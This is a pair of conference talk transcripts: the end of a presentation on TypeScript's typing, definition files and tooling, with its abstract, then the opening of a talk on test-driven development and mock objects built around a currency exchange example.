So you knock out Angular, jquery, node, require.js. Yeah, it has a lot here. So you'll probably find some of the frameworks you're already using. So don't have to create these files yourself. So I'm going to show you quickly how this works. Like so. Just close all these files. I have now a definition file for jquery. And again, all it contains is just interfaces. It does not contain any implementation of jquery. So you can just see that it contains a lot of interfaces here and different functions. This doesn't say anything much like so. But what you can do is if I am writing a jquery function here, I can actually just write it like so. If I have to write something like this. And I don't get any auto-completion here because it doesn't know what type this returns to me. So I know there's a text probably, or maybe there's a function called add. I don't know. Can add some text. Hello. And this doesn't work. What I could do just to get the compiler off my back, I could use declare variable here. Again, I know what I'm doing. I know this library works and I have loaded this already. It's not strongly typed. So that's the simplest way to get it to work. But I can actually do one better. I can actually use this type file. Like so. You see it actually adds now reference to that file. And what that does is give me strong typing now. So now it knows that the type of this dollar here is of type jquery static. And that means that I actually get strong tooling here as well. So now I can actually browse all the possible methods I can use on this type. I think that's a great thing. So if I were to call, for instance, text now, can I set the text or can I get the text? Let me see. Okay. Here I have all the overloads of this one. So I can actually scan through those. So I see, okay, this takes in a string and I can return, it can return a string. Great. So you actually can, if you're new with the framework, you can actually easily learn this. And a great example to show that is actually underscore. I don't know how many have tried underscore, but don't have that definition following, but I can try installing it. So I'm using NuGet package manager to just get this source file. And it, so I have it on the file system. I'll just browse it. Code, demo, packages underscore. Okay. This is great. Like so. I can just drag it into there. Nope. Like so. And now we shall do is again. So and again, I always look up the documentation underscore. So again, I can just reference reference.file. This is way, is dragging and dropping it. That is a plugin called web essential that helps me out with this. So now I get the code completion on underscore. And that's, I need that a lot to help me understand how I do, for instance, the reduce function. What do I do there? So I can actually see the signature here, what, the sequence of parameters here. So back to slides. How am I doing on time? 20 minutes or so. All right. I want to talk a bit about tooling. TypeScript has already gained a lot of support in IDs and tools. It works best in Visual Studio right now, because it makes it and also makes the plugin. But you also get good support in Cloud9 and Sublime has a nice package that helps you compile and gives you syntax highlighting and some auto completion as well. So I think this is just an indication that there is many that invested time in TypeScript already, even though it's still a preview. And there have already appeared some community tools around TypeScript. 
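Condensed into code, the two approaches from the jQuery part of that demo look roughly like this (the path to jquery.d.ts is wherever the definition file was dropped):

```typescript
// Option 1: an ambient declaration just promises the compiler that `$`
// exists at runtime because it was loaded in a <script> tag. It compiles,
// but `$` is typed as any, so there is no checking and no auto-completion.
declare var $: any;
$("#demoButton").text("Hello");

// Option 2: reference the definition file from DefinitelyTyped instead.
// Then `$` is typed as JQueryStatic, calls like .text() are checked, and
// the editor can list every overload.
//
//   /// <reference path="typings/jquery.d.ts" />
//   var label: string = $("#demoButton").text();
```

Editors and plugins picking up these definition files is a big part of the tooling story.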
We see, for instance, the TypeScript definition package manager, which is a tool to download those definition files like you do with the Node package manager. So it actually versions them and lets you easily update them if you want to. And Web Essentials is a must-have for Visual Studio if you are using Visual Studio. It allows you to configure how the compiler works and gives you some extra features with TypeScript. So I just want to give you a high-level overview of how TypeScript compares to CoffeeScript and Google Dart, just to know what the main differences are. Comparing it to CoffeeScript, we see that CoffeeScript is a much higher abstraction over JavaScript than what TypeScript is. Again, TypeScript is just a superset, while CoffeeScript tries to lend style from both Ruby and Python. So it has a more functional approach to developing JavaScript. And it's great for its purpose. It also has a much simpler class concept, but it still has this way of helping with encapsulation. But CoffeeScript in itself does not give you any help with file loading and dependency management. You've probably seen Node being used with CoffeeScript to handle that. And then Google Dart. I haven't coded anything in Google Dart myself. But that's a completely new language, inspired by C syntax. So you can't just reuse your current skill set in JavaScript like you can with TypeScript. And it actually tries to solve many of JavaScript's inherent problems. But it also gives you many of the same constructs that you already have in TypeScript. But Dart has a lot more of them, language constructs. And there's a potential vendor lock-in. Again, you have this Dart VM, which is a part of Chrome that runs Dart without compiling into JavaScript. But you don't have to do that. You can also compile it to JavaScript. The resulting file is really big. And it has also received some criticism from Brendan Eich and Douglas Crockford, who are some notable characters in the JavaScript community. Brendan Eich actually created JavaScript. So that's just comparing it to those two. And one thing that's important to notice is that JavaScript is getting there. JavaScript will get classes, will get modules. It will get many of these modern features. But ECMAScript 6 is still a draft and it's not completed. And when that is completed, the implementation will start. And when the implementation starts, it will take some time for it to get implemented in all the modern browsers. And I have no idea how much time this will take, but an unqualified guess is two to three years. And it will be really similar to what TypeScript is now, but TypeScript will have types and some more. So JavaScript will still be a subset of TypeScript when it's done or released. So TypeScript is, like I said, still a preview. It's not finished. But there has recently been released a new preview version that actually has generics and some performance tweaks. And adding generics is a really cool feature. So you could actually implement LINQ, Language Integrated Query, in TypeScript. I don't know if anyone has started on that, but it's an interesting feature to have in that language. And for when the language is completed, there is a plan to add async and await support, like the C sharp keywords. And I think that is a really, really cool thing to add to this language. Because right now we are doing callbacks, and we could instead just use the async and await keywords in order to do this the same way as we do in C sharp 5.
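As a rough illustration of what those generics make possible, here is a small, invented repository type: nothing LINQ-sized, but the same idea of keeping a collection strongly typed without casts:

```typescript
class Repository<T> {
    private items: T[] = [];

    add(item: T): void {
        this.items.push(item);
    }

    // A tiny, LINQ-flavoured query: filter by a typed predicate.
    where(predicate: (item: T) => boolean): T[] {
        return this.items.filter(predicate);
    }
}

interface Person {
    name: string;
    age: number;
}

var people = new Repository<Person>();
people.add({ name: "Kari", age: 42 });
var adults = people.where(p => p.age >= 18);   // typed as Person[], no casts
```

The planned async and await support would bring a similar tidying to asynchronous code, replacing nested callbacks with straight-line code.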
For those of you who have tried it, I think that will make the code easier to read and more easy to follow. And it will also add mix-ins to language. That's an interesting feature that the, because JavaScript is dynamic language, you can actually do mix-ins. And having that in TypeScript as well is really useful. So I promised you, I'll tell you about where the dragons are. But there are not many and they're not that severe. One thing to be aware of is using TypeScript or trying to use TypeScript in existing JavaScript frameworks like Angular. Angular actually tries to solve many of the problems that, or tries to make it easier to create JavaScript application. And it is designed entirely for JavaScript. And many of the things it tries to solve is not necessary to solve in TypeScript. So, and this is not just an Angular problem, but some frameworks might be difficult to use in TypeScript. So be aware of this. Don't try to use, for instance, one of the problems with Angular is that it's based on functions and functional design. And you don't need to need that in a TypeScript application. There are other ways of solving this. So a tip might be looking for a dedicated TypeScript framework that works better. So another thing is that there's a lot of syntactical shortcuts that you can use. But I'm pretty sure that you will end up with really messy code that's unreadable if you use this without caution. Especially you can actually do inline Type specification of interfaces. That means that you can actually, instead of creating an interface outside, in another place in the code, you can just write the interface declaration then and there. And you have, and you can also nest the modules that you're declaring really deeply and try to avoid that. And when using arrow functions, you can also, again, you can make these two complex for it to be readable. Again, it's still a preview. There are bugs in TypeScript, especially around when you use the property get and get and set properties. There are some known bugs there. And protected accessibility is not implemented yet. It's planned in a future release. So if you do subclassing, you don't have the keyword protect to make a field available to your children. And there are still features that need improvement. For instance, modules and the way you import modules need some improvement just on syntactical sugar in order to ease up how this is done. So I'm going to just look back at what we have been through. We've seen that we learn what TypeScript is. We have taken a deep dive into all the new features, almost important features. We have looked at how we can actually do dependency management in real world application, and compare it to some languages. And we see what's happening right now with both JavaScript and TypeScript. And what we can take out of this is that by having a compiler, you can actually eliminate a lot of bugs that you usually would find around time with JavaScript. You get strong typing and thereby strong tooling in your IDEs. So it makes it easier to refactor, you can actually refactor TypeScript code in your ID. You get more encapsulation, and you have mechanisms to simplify dependency management and, again, ID support. And it actually also lowers the threshold for beginning with JavaScript. So I personally think that the threshold for a developer that has not done JavaScript development is quite high right now if you wanted to start with JavaScript. 
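One of those shortcuts, inline type specification, looks roughly like this; it is legal, but usually worth pulling out into a named interface before it spreads:

```typescript
// Inline interface type: the whole shape is crammed into the signature.
function send(command: { name: string; payload: { id: number; body: string } }): void {
    console.log("sending " + command.name);
}

// The same thing with a named interface reads better and can be reused.
interface Command {
    name: string;
    payload: { id: number; body: string };
}

function sendCommand(command: Command): void {
    console.log("sending " + command.name);
}
```

None of this changes the point just made: the threshold for starting out in plain JavaScript is high.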
But working with TypeScript, I think that might be a bit easier because you have constructs from object-oriented programming. So it will be a lot of pressure. You can reuse more of your existing knowledge. There are a few advantages for large-scale applications. You can actually build more robust apps. You have a strong typing that helps you and ensure that you have correctness throughout your application, at least when it comes to the typing. An interesting case, I experienced once, we were free developers working on a codebase, and we had interfaces for different commands we sent to the server. And at one time, one of us changed added a new field to this interface. And what happened then? We had three builders, and then we could actually find the three places in our codebase that we needed to update in order to conform to this new interface. So that was just an example of how you can get more robustness out of using typing. And you can also enforce design. You can actually do design patterns now, more easily at least. I don't know if it makes sense in TypeScript, but at least you have the mechanisms to drive the design. So you, as a... If you are developing a framework, you can actually make it really easy to use that framework for other developers. And you get more maintainable apps. This is probably what the enterprises want. They want something that is maintainable. I think JavaScript is... Might be a difficult technology to choose if you're enterprise and want to... And you don't have JavaScript resources. So this makes it easier. And you, again, it might be easier to train or get developers that know TypeScript or object-oriented design. And for small scale apps, it's not that much to gain on using TypeScript, but you get a simplified build process. If you're using Visual Studio, just compile when you save. You get less bootstrapping. You don't have to do as much to get your application up and running. You can just use the internal module references and things will work. And I think probably the biggest win is the strong tooling where you get autocomplete help in your IDE. And I think that's actually one of the things I've liked the most. So that was actually... I want more thing I can actually show you. Just for a little wow effect here. So this is the first time I actually used a GIF in a presentation. Do you like it? All right. I will now have to see if I have a file for this. All right. I'll actually create a new file for this. So add... Again, I have to switch here. All right. I'm going to scroll down to add a new TypeScript file here. And the setting I'm in right now is that I'm creating a Twitter application. So what I'm doing, I'm going to create something that gets a list of tweets or the timeline from Twitter. And if I were to do this with strong typing, I would have to go into the documentation. So I could go here and read the documentation for that query. So here all the parameters are described. And I would have to copy them into... Make interfaces out of this manually. But there is a cool little trick you can do. So if I just copy this one, which is one of the parts. And this is just a JSON file, not just a JSON code. So I have this feature in a web potential called paste JSON as classes. So if I do that, like so. I have to ensure that I haven't get... I have to take more or less of this. Again, wow effect. No, it's without them, I think. Yeah, it's without them. It's supposed to work like so. There we go. So what we see now is this is the... 
I can actually just call this the timeline. So what I have now, now I have a strongly typed type for entire return object here. So it has created it. So small modifications I can actually now have strong types. So if I were to have a jQuery function that looks something like this. So if I had something like.get timeline and in the call box I get this data, I can say that this data is of type... time... Twitter timeline. So now actually in the response, I could actually code knowing which fields were present in this. I don't know if this works. Yeah, so I can actually navigate the return structure here. So I think that's one of the cool features. So that was what I wanted to show you today. So are there any questions? I will be putting this presentation up on slide deck later. So if you want to... why don't it fix my presentation? Yeah, the cable here is a bit loose. Yeah, you probably managed to read that, right? So I don't know why it's not switching over to... try this. Let me do like so. Okay, you can reach me at Twitter. For instance, I'm going to post the links to the slides on Twitter afterwards. And if you want to see the code, I can probably put it up in GitHub. So the last thing I want to say, remember to vote outside using this, hopefully this green one. So thank you for your attention today and have a good conference.
|
There have been several attempts at patching static typing into JavaScript, but none have had notable success. TypeScript is different. Aligning with the EcmaScript 6 standard, it is a simple superset of JavaScript that’s easy and intuitive to learn — especially for those who know JavaScript. In this talk you will learn what TypeScript is, what’s new, how it differs from JavaScript, what to be aware of and where I think TypeScript is heading. TypeScript’s static typing opens up a whole new dimension for large-scale applications. It enables language analysis, gives type safety, refactoring support in IDEs as well as other features that are hard to achieve in JavaScript. Additionally, typing is optional, so you can add typing step by step in your existing application. This presentation will be loaded with code examples. I will give a quick comparison to some related languages like Dart and CoffeeScript, just to show you the difference and explain when TypeScript might be a safer bet. I have looked extensively into TypeScript and used it in production code. Come get the distilled version of what you need to know!
|
10.5446/51527 (DOI)
|
session on succeeding with TDD, pragmatic technique for effective mocking. My name is Venkat Subramanyam. I'm going to just talk maybe about for about five minutes, a little bit more maybe, and then we'll get into code and rest of the time we'll take a look at an example and then drive it through Test-Triven Development and mock objects. Best time to ask a question or make a comment is when you have it, so please don't wait till the end. Anytime is a great time for questions or comments, please don't hesitate. So talk a little bit about benefits of unit testing. I won't spend too much time on this topic, but just to quickly highlight why we want to do these things. The two things that I really like about Test-Triven Development is the two clear benefits in my eyes are one is regression. You want to make sure that the code that you wrote once continues to work as you evolve and modify the design. The second benefit of TDD, which takes a little bit more effort, okay, a lot more effort, is to make sure that our design is actually practical, design is lightweight. So Test-Triven Development can benefit by creating or help us to create a better quality design, but that doesn't come too naturally at least for me. It requires a little bit of effort in getting that. But the regression aspect definitely is there. As we evolve the design, it definitely gives a feedback to say that the code actually not only worked before but continues to work. In a lot of ways, it gives us an ability to do fearless evolution of code because within a short span of time, it gives a rapid feedback that the code actually is working as well. That has definite benefits. Now, of course, when it comes to unit testing code, unit testing is very easy when the code we are trying to test is independent or isolated. If you have a little code that does a formula calculation, a mathematical operation, currency conversion, what have you, you may say this is easy to do because it doesn't have any dependencies on other things once all the information it needs is given to it. So it's very easy to unit test code that has no dependencies. Unit testing code that depends on other code becomes incredibly difficult. What if you have a piece of code that has to talk to a database, a piece of code that has to talk to a remote server, a piece of code that requires authentication to something before it can get the data, a piece of code that has to process credit card and then based on that has to do other operations, all these code can become very difficult to unit test. It becomes brittle because we also have these dependencies. Not only can it become slow, and oftentimes how do we solve the problem? We quietly say this code is not testable. Well, one of the things I've realized over time is when somebody tells us this code is not testable, that is actually a euphemism. What they are trying to tell you is the design of the code actually sucks. So if a code is designed fairly well, we can actually test it. So it's important for us to be able to write code and design code in a way we can actually test it. But how do we go about really writing these kinds of code where it can be tested? Now, this is where mock objects can help us. But before I talk about mock objects, I want to emphasize one thing. I don't want to kind of mislead people to say mock objects are great and use them. That's not what I'm saying. Mock objects can come to our rescue, but we have to be very careful using them. 
In this entire presentation, I'm going to focus on using mock objects, but I don't want to carry you towards saying, oh, great, use them all the time. That's certainly not what I'm saying. Be very sparing in using mock objects as well, because I've seen projects where mock objects become really difficult and they get into this mode called a mocking hell, and it becomes really hard to maintain code after that as well. So be very sparing, be very cautious in using them. So what are mock objects really? Mock objects are objects that can stand in for other objects. So let's say for a minute, I want to make a good movie with a famous actor. Obviously, it's going to be expensive to set up the stage with this actor on stage. So we'll probably walk around the street, find a guy about the same height and weight and say, hey, would you like to come and stand in, and you have an opportunity to look at the famous actor at the end of the day? So this person, of course, comes and stands and helps you set up the stage. And obviously, this person is not as good as the famous actor is. Otherwise, you would be paying big bucks for this guy to come and stand in as well, isn't it? So the point really is that it is a stand-in, something that comes in, stands in for a real object. There are some seats available here as well, but if you're more comfortable sitting, that's perfectly fine. I'm not saying you shouldn't. I a lot of times sit, and I don't even wear shoes, as you can see. So make yourself comfortable any way you want to, but there are seats available here. So the real idea is to stand in for real objects so that we can accelerate testing. Now I don't want to spend too much time on this topic either, but I do want to draw a quick distinction between stubs and mocks, mainly because we face these kinds of concerns. As for the difference between a stub and a mock, Martin Fowler describes this fairly well. He talks about how a stub represents state for testing purposes, while a mock represents behavior for testing purposes. So the real idea is, if you're really interested in the object just standing in for another object, a stub is quite enough. But a mock object, as I see it, tattles tales to you. It says, let me tell you what really happened. Here are the methods that were called. Here are the number of times the methods were called. So it gives you a lot more detail. Now, having said this distinction, invariably I don't get too pedantic about it. Yes, there are differences between stubs and mocks, but I really don't care. So most of the time I use the word mock very loosely, and there are times when I really am using a stub and I use the word mock. I don't want to be sitting there and thinking too much about it, and things kind of fall in place most of the time. So when you hear me use, say, the word mock, it could be a stub sometimes, it could be a mock at other times, but it really doesn't matter most of the time as long as we kind of know the difference within our own context. So how do these mock objects really help? There are two ways in which mock objects help. The first way mock objects help is they stand in for good behavior. For example, let's say I want to process my order and I need to talk to a credit card system. I don't want to talk to a real credit card system because of all the complexities involved in it. So I will put a mock object in place and say, for any request that comes in, simply approve these requests, and it can simply respond back with an approval.
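A rough sketch of that distinction, written here in TypeScript with an invented payment gateway interface, purely to illustrate the idea: the approve-everything stand-in is the stub, the recording one is the mock.

```typescript
interface PaymentGateway {
    charge(amountCents: number): boolean;
}

// A stub stands in with canned state: every request is simply approved.
var approveEverything: PaymentGateway = {
    charge: amountCents => true
};

// A mock also tattles about behaviour: which calls happened, and how often.
class RecordingPaymentGateway implements PaymentGateway {
    chargedAmounts: number[] = [];

    charge(amountCents: number): boolean {
        this.chargedAmounts.push(amountCents);
        return true;
    }
}
```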
And I can run my test very quickly with this mock object. But more important, a mock object is also very helpful to stand in for bad behaviors as well. For example, what are the possible things that could go wrong when I try to communicate with a remote system that is going to process my credit card? Well, what is it that cannot go wrong, right? Any time you turn around the corner, there's Murphy sitting there saying, here are things that could go wrong. So, but how do you know that your program handles these properly? Well, you can set up a mock object to start failing in a very predictable way so that you can make sure your code is handling these failure situations. So when your code does talk to a real system, those failures can be gracefully handled. So a mock object can pretend about bad behavior that you may expect as well in a very deterministic manner as well. And that becomes very helpful. That's all I'm going to talk about for most part. But I think the real fun is really trying things out. So for the rest of the session, I'm going to try out an example and I'm going to create a little sample code, play with it, let's start somewhere and see what we can do. So I'm going to use an exercise, a sample exercise to create and play with it. And I've been struggling with this for a while with various tools and techniques, but I also ran into something, you know, that is kind of interesting in Visual Studio 2012, which is the Fakes library, which really gives a very interesting way to mock out things. I've used RhinoMock quite a bit in the past. I really like RhinoMock, but there are times when I kind of hit a few limits on RhinoMock as well. But Fakes seems to really bring enormous power on our hand. But of course, remember the wise words of Uncle Ben, with great power comes great responsibility. So we've got to use it wisely as well. But let's take a look at how we could use it as well with an example. So here's an exercise that I would like to start with. In this exercise, what I want is, I want to implement a currency exchange object. So fairly simple to this currency exchange object, I'm going to give a name of a currency. And I want to know how many US dollars I'm going to get back from this currency. Well, in order to do this, of course, my service provider here is running the business where they want to communicate with other providers really, and then find who offers the best rate, and then mark down the price by 2% to get a profit, and then return back the remaining money. So this code is going to go to a service and say, hey, vendor one, what kind of currency rate can you give for me? And they say I can offer you a $5.22, for example, or five chronos and 22 cents. And then I ask for vendor two, well, that happens to give an error today. And then I ask for vendor, so I love the error information. I ask for vendor three, it gives me a rate. I mark it down by 2% and return back the vendor three and whatever the value is. So this is what I want to implement. Very simple example, but there are some challenges already. There is a little bit of math I have to do, but I also have to talk to a web service which is out there somewhere on the web, and assuming I'm connected to the web, I should be able to connect to it as well at the very end, hopefully, and we can see it. But how do I go about designing this code? So I'm going to take a test-driven approach to design this and keep a check on me. 
I should not write any code until I have a test failing, and I'm going to write a test after that, and then we'll slowly introduce it. So I'm going to go through a series of steps to make this example work, and when we are done with it, I'm hoping we'll have the scenario working where we'll go to the web service to talk to various different objects. If there's an error, we'll log it to a file, an error's file, and then we'll return back a good response to the user saying, here's a vendor that I'm going to provide for you, and here's the mark down price after we took the profit away from the cost that we're going to give it to you. Seems reasonable so far. All right, let's go ahead and start with something. Where do I start? I normally want to start with what's called a Canary test. What's a Canary test? A Canary test is a little test to make sure things are actually set up on the machine. I work with a lot of different companies. I work on projects, and when I go over there, I find that a lot of times, tools are not set up properly, and a Canary test is a good way to make sure things are set up. It's a stupid test, you say, assert true is true. I mean, how stupid it could get beyond that. And if assert true is true, actually fails, you know you're going to have a very long day trying to fix the system, right? And then you can have people come over and take a look at it, and you say, this is not working. Can you help me set up the system? And they will ask you, what are you doing? And you show them the code, and they say, that's stupid. Yeah, please help me make that work really, right? So you're not writing 50 lines of code and then messing with it. So let's start with the little Canary test to begin with. So all I have here is a test class called currency exchange test, that's the name of the class, and I want to write a test over here. So test, I'm going to write a test method right here. I'll call it a Canary test. And all I'm going to do in the Canary test as I promised is I'm going to simply say assert true is true, as simple as that. And I'm going to go ahead and run my test right now, and see if the test wants to run, it's building the test at this point. And of course, this test, if everything goes well, should pass, and it should tell me that the Canary test is passing. And so right there is the Canary test. Today is my lucky day. You can hear the Canary sing. Well, the term Canary test comes from this little phrase that, Canary in a coal mine, so the miners take this little bird, Canary, in a little cage, and they go into the mines. And of course, as they are working in the mine, sometimes there could be a bad fume, which is dangerous to the health. The Canary keeps singing all day long. And if it smells this fume, it dies. This is very good for the miners, not so much for the Canary, unfortunately. But it gives a quick feedback cycle. That's what we are doing here is a little Canary test. So it looks like my environment is set up properly. I'm using Visual Studio 2012 here, not a whole lot. I have this test class called a currency exchange test. It's in a separate test library, by the way. I also have this other file here called currency exchange, which is in its own libraries. I have two separate libraries here. One is the test library, and the other is a normal dot net class library. That's all I have on my hand at this point. Okay, great so far. What's the next thing I want to do? Well, I want to implement the simplest case. I want to implement a markdown. 
So let's go ahead and write a test for a markdown. So what I'm going to do here is simply say I want to write a test for markdown. So we'll call markdown over here. Now, this should be fairly simple to get going. So what am I going to do within the markdown itself? I'm going to give a little space here so it kind of stays in the middle. All right, so I'm going to create a currency exchange over here. So currency exchange is my object. And in this case, I'm going to say currency exchange and equals new, let's say currency exchange object. And of course, the studio should complain to us that it doesn't have a clue what currency exchange is. We can quickly fix that. Let's go here and add a reference to this. So I'm going to go to my test library, add a reference. It should be in the solutions to the project itself right there. I select that right now, and that's all I'm doing. I'm bringing that back over here. So that should be enough for our purposes. So let's go ahead and bring it. So in this case, of course, I added the library. So let me go ahead and ask him to bring in the using for it. So that should please the compiler. So now I'm going to simply say currency exchange dot. I'll call markdown. So markdown is going to simply accept some value of currency. And of course, I want to make sure this is giving back the right result. So we'll say are equal. And of course, 2% is taken away. So that should be 98 out of the 100 that I'm interested in receiving back. So let's go ahead and implement the markdown method. Of course, the test is failing already. You can see the compiler didn't even like that code. So let's go ahead and make that test pass. So I'm going to go ahead and implement this markdown. I'm going to take an amount as a parameter. In this case, I'm going to simply return. And let's go ahead and return amount times 0.2% 98% rather, isn't it? So 0.98. And that should take care of it. Of course, you may argue, dude, don't you want to just return the value itself and then write more tests to do it? Absolutely, we could do it. But I want to move on to other important tests to work on. So I'll kind of bypass those steps right here. So our markdown is working as well. So that's a good news. So it's time for us to get to a more interesting test at this point. What about getting the rate for a currency itself? Now, what if there are no vendors? So notice that I want to start from very small steps. I always contend, you know, confront with this, what am I really doing in test and development? I spend a lot of time talking to programmers because we learn a great deal when we talk to each other. So in one of the discussions, I was asking, how do we really approach test and development? And what I heard was something that intrigued me. TDD is an approach where we go from a set of unknowns to a state of known. And I thought that was a really nice way to think about it. But the way I want to emphasize that a little bit more is, I want to go from a state of unknown to a state of known, but only looking at one small unknown at a time in manageable pieces. So that really makes a nice path for us to walk through and build on what's working already. So I start with a no vendors to begin with because I want to say I don't have any vendors at all. That's easy to write, not a whole lot of code to write, and I can get the interface set up. Why go through these little steps? 
The reason why I like to go through these little steps is the very first few steps really helped me to build the interface of a class. And then as more tests are written, it starts forming the guts of the code itself. So we go from the outer skin of the interface to the inner implementation by going through this approach. So I tend to really take this approach to develop it. So I want to write for a no vendors. So I'm going to write a little test here that's going to be for a rate given no vendors, let's say vendors, and how do I implement this rate given no vendors over here? So let's go ahead and say again a currency exchange. I'm going to create an object of this currency exchange. So in this case, of course, I'm going to say the currency exchange is going to have a method called get rate, let's say. So get rate is going to take the currency I'm interested in. We are assuming for a dollar of rate that we are interested in giving here. And what is this going to give me? I'm going to simply say double, let's say, rate equals, and it gives me a rate value. But I want to assert and get whatever the value of the rate is. So I'm going to say r equals 2. But remember from our problem description, we had two things coming back, the vendor name and also the rate itself. So we need to take care of that. So I'm going to say var rate over here. But what is the rate going to be? Well, I want the rate to be something that I would expect to be reasonable. But as a web service, as a service that relies on web services, what is a good response I have to give? Well, it makes absolutely no sense to complain to the user that the web sucks and the server is down because the user cares less. So one way you can really convince the user not to do business with you today is you can say, I'll take all your money and give you back nothing. Right? That will be very clear message if something is totally wrong. So I'm going to simply return back over here a rate value I'm going to expect. So I'm going to say expected equals. And of course, all that I have to verify here is that the rate I got back is expected. But what is this expected value, by the way, the expected is going to be just a couple by the way and the couple of a string and a double value. And in this case, all that I would like to give to it is a no vendor name and a 0.0 value given to it. And that should be quite adequate for our purposes right now. So this kind of defines the interface of this function taking a rate, get rate function which takes a string, which is a currency name returns back a couple of these values. Let's go ahead and implement this function by the way. So I'm going to go ahead and ask him to generate the step for me. If I go back over here, it has the get rate method which I want to return a couple of a string and a double value as you can see here. And then of course, in this case, I'm going to say currency, which is what I want to send to it. And this is going to be a fairly simple implementation at this point will simply return new couple. And this is going to be an empty name and a 0.0 as a value. And that is all I need to really return and we can see that test is really passing. So we implemented the interface for this with no vendors and we defined what it should do when no vendors are given. The next step here is to implement for one vendor. So we're kind of gradually adding the complexity. What if I do have one vendor? How do I want this to implement? Remember the problem on hand one more time. 
When there is a vendor, I have to go talk to the web service. But I don't want to talk to the web service at this time. And the reason simply is because I want to keep my focus on my logic I'm implementing. I don't want to worry about the web service at this point. I kind of know what the web service should do for me. I don't care to know how it is going to be. I'm going to communicate with it at this moment. So we can gradually move again from a series of unknown to one unknown solving one unknown at a time and then going towards knowns. So what am I going to do to avoid that particular concern? So to avoid that concern, I'm going to go ahead and create an interface because how do we really deal with dependencies? Well, one way to deal with dependency is to eliminate it. By the way, that's a very important thing to consider. A very important design decision is not to invert dependency but to eliminate it wherever possible. Because the more dependency we deal with, it's a pain. But it depends on things that we cannot eliminate. We can invert the dependency by throwing in an interface and of course an interface stands in really nicely and then we can then implement it the way we want to implement it. So how do we go about implementing this? So let's go ahead and write our test case first. So in this case I'm going to say the test I want to write here is a rate given one vendor. Well, how do I implement for a one vendor? So I'm going to go ahead and introduce the currency exchange one more time here. You could argue that we could use a setup method and remove dependence duplication of this. Fair enough but I'm not going to go that direction right now because that's not going to help us go in the direction I want to go. So I'll kind of avoid that for now. So I'm going to say expected equals new tuple one more time and in this case it is going to be a string and a double as well. But this time I'm going to say vendor one is the vendor we selected and I want this amount to be a 98, you know, a unit of currency. So that is my expected and I'm going to say rate equals currency exchange dot get rate one more time and in this case of course I would like to get the rate value asserted so we'll say assert R equal one more time and then expected and then rate that I'm expecting back. But looking at this test how in the world do I know that this is going to be a result of vendor one and the value of 98? So we got to do a little bit more preparation for this. So I'm going to say currency exchange dot and in this case of course I have to set up the details for the currency exchange. So I'll say set vendors over here and in this case of course I'm going to pass to him the vendor one itself that I want to pass in and say I want to tell you that I have one vendor available to me but go ahead and find me the results for me. So given this value but still how does it know that the value should be a 98? We haven't given that detail to it yet. So the idea really is this. We want to go to this object that we are testing right now, ask him to give a price. He knows that there is a vendor one. He's going to go to the web service and say hey I'm going to give you a vendor one, can you give me the price back to me? So to make this code testable we want to mock out the service that we have on our hand at this time. So how do I mock out the service? 
Well to mock out the service all that I have to do is simply write a little implementation that says given this vendor name just simply return back a price of 100 and then as you mark it down by 2% you get back a 98. So we can easily work through that very well in this case. So to do this I need a mock object but let's wait a little bit before we can introduce that mock object over here. So to make that happen I'm going to introduce a i vendor service over here and I'm going to call it vendor service right here and this vendor service I'm going to implement this in just a minute so I'll just leave it as a null for a second and I'm going to say this is a vendor service by the way that I want to pass to the constructor. So we are using this dependency injection through constructor. There are about three ways to introduce dependencies well maybe more than three ways but one is to introduce it through a constructor. The second way to introduce that would be using a setter and a method on the class. A third way probably is to use a factory under the hood where you call the method you are interested in that calls into a factory and the factory will give you the instance you are requiring. This is where other approaches like you know spring and so on comes in for injecting the dependencies. So in this case I'm going to do a very simple constructor based injection but in order to do this I need a vendor service by the way but where is this vendor service. Well it's pretty easy I'll go into the library code and I'll go ahead and add in this case and I will simply add an interface that I want to create in this case and this is going to be called a vendor service. Oops it's going to be I vendor service so I vendor service is what I want to create and I want this to be an interface in this case. Let's even make that a public interface. We can come back to the methods of it a little later. No rush to work with it. So that is the interface I just added right here and I'm passing it to this particular class. Of course for this to work I need a constructor that takes this particular argument so let's go ahead and add it. We'll create one constructor which doesn't take any parameters because we used that in the previous test cases. We'll create yet another constructor where this constructor takes a vendor service and I'll just say service here and I'm going to simply assign it to a vendor service equal service right here. Well this vendor service is going to be just a field I want to create in the class so right there is the field I've created to hold the vendor service itself. Now let's get back to the test itself and see what we're going to do here. Well we are good so far I need the set vendor service method. Let's go ahead and implement that method and now to get to this point what about this vendor service I need to implement it. Well that's going to be a little mock object so I'm going to be lazy and create it right here and I'll call it as mock vendor service and this mock vendor service simply implements the vendor service itself and we'll come back to look at what it should do a little bit later. So I got this vendor service and I'm going to simply say new mock vendor service and create an instance of it. So we have the code in place so far we have created a mock object for the vendor service and we have told him that I want to use that object here and we are passing the vendors to this class and using it so we have to go back and implement this method properly for it to work. 
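The shape being built here is plain constructor injection, and the idea is language-agnostic; a compact TypeScript sketch of it, with names mirroring the talk's IVendorService and CurrencyExchange rather than any real library:

```typescript
interface VendorService {
    getRateForVendor(vendor: string, currency: string): number;
}

class CurrencyExchange {
    private vendor = "";

    // The dependency comes in through the constructor, so a test can hand
    // in anything that satisfies the interface.
    constructor(private vendorService?: VendorService) { }

    setVendors(vendor: string): void {
        this.vendor = vendor;
    }

    markDown(amount: number): number {
        return amount * 0.98;
    }
}

// In a test, the stand-in can be an inline object literal: no separate
// mock class to create, grow and maintain.
var exchange = new CurrencyExchange({
    getRateForVendor: (vendor, currency) => 100
});
```

That is the whole shape: an interface, a constructor that accepts it, and a stand-in supplied by the test.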
So let's go ahead and create a vendor for a minute we'll call it a vendor and in this case I'm going to create a vendor and this let this be just an empty string for a minute actually it's leave it as a null for a minute and then of course in the code I need to tell him to use the vendor service where do I set it. In the set vendors method let's go ahead and set the vendor so I'll say vendor equals the given vendor itself so I'll just take one vendor for now and on this case of course I have to use this vendor in my code so how would I use this vendor itself so right there is the string vendor and I've assigned the vendor over here much here why he's complete oh there we go my eyes are fooling me and of course I have to use this so what am I going to do in the method get rate well that's fairly simple so I'm going to first of all create a rate over here and I'm going to simply return this rate value so we'll simply say return rate but in between we will say if the vendor is not equal to a null then I'm going to go ahead and use this vendor so to get the rate itself but the vendor service by the way is the mock object so we can readily use that as in it so I'm going to say here amount equals mark down on the given amount but where is the end value itself in the vendor service and I'll call a get rate for vendor which doesn't exist right now and we give them a vendor name and then we also give them the currency name as well so we are slowly defining the behavior we expect of the interface which will be implemented by our mock object now you may argue don't you have to know what the real service you're going to depend on provided sure we do but it also only matters if it serves our purposes so we'll kind of drive it from our need and then map it over to what it provides when we get to that point so in this case I have a get rate for vendor and we have to implement it but once this is done my next task would be to create the rate itself in the format we are interested in so new tuple over here and then this case I will say this is the vendor name and then the amount is the rate 